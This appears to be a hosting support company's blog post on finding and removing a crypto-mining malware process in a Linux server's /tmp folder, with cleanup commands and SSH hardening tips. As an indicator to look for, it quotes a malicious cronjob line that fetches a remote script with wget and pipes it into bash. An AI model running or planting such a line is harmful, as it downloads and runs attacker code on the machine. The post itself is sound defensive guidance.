Are you dealing with malicious tmp processes? We can help you tackle it.
Recently, one of our customers contacted us siting that there was a process showing in CPU stats that consumed around 90%. This was a crypto miner malware and this should be deleted from the server.
Here at Bobcares, we have seen several such Linux-related errors as part of our Server Management Services for web hosts and online service providers.
Today we will see how to resolve the malicious tmp processes problem.
What causes malicious tmp processes problem to arise
Here are the different causes for this problem to arise.
- A brute force attack against SSH accounts
- Automated installation of a pre-compiled binary once access is obtained.
- Modifying the system to ensure malware persistence.
- Start mining cryptocurrencies on the victim’s CPU or GPU.
Mostly, this attack is not destructive. But we can’t ensure what else was modified during the attack. So we have to reload the affected system completely from known good backups which wastes our time.
How to resolve malicious tmp processes problem
Now let’s take a look at how our Support Engineers resolve this issue for our customers.
As mentioned above, we had a customer who approached us with this crypto miner malware.
We can check whether the process is running using the command given below:
ps aux | grep <processname>
We look at the cronjob of this user:
crontab -u username -l
If it has this string:
* * * * wget -q -O – http://192.98.132.xxy:8220/mr.sh | bash -sh > /dev/null 2>&1
Then we edit this cronjob using the below command.
crontab -e -u username
Delete the cronjob using the below command.
crontab -r -u username
Then delete the corresponding files in /var/tmp and /tmp folder.
/var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123
Preventing Cryptomining on Linux
To protect against these attacks, here are the different steps our Support Engineers suggest to our customers.
- Disabling all default system login accounts.
- Disabling SSH password logins and set SSH private key authentication.
- Enabling two-factor authentication for SSH.
- Blocking access to all network services that do not need to be exposed to the Internet (for example, databases, control panels and SSH ports).
- Also, make sure to monitor systems for unusual CPU, memory, disk, and network activity.
- Use host-based intrusion detection to spot any problems that might have slipped through.
[Still not able resolve malicious tmp processes? – We are here to help you]
Today, we saw how our Support Engineers resolve malicious tmp processes.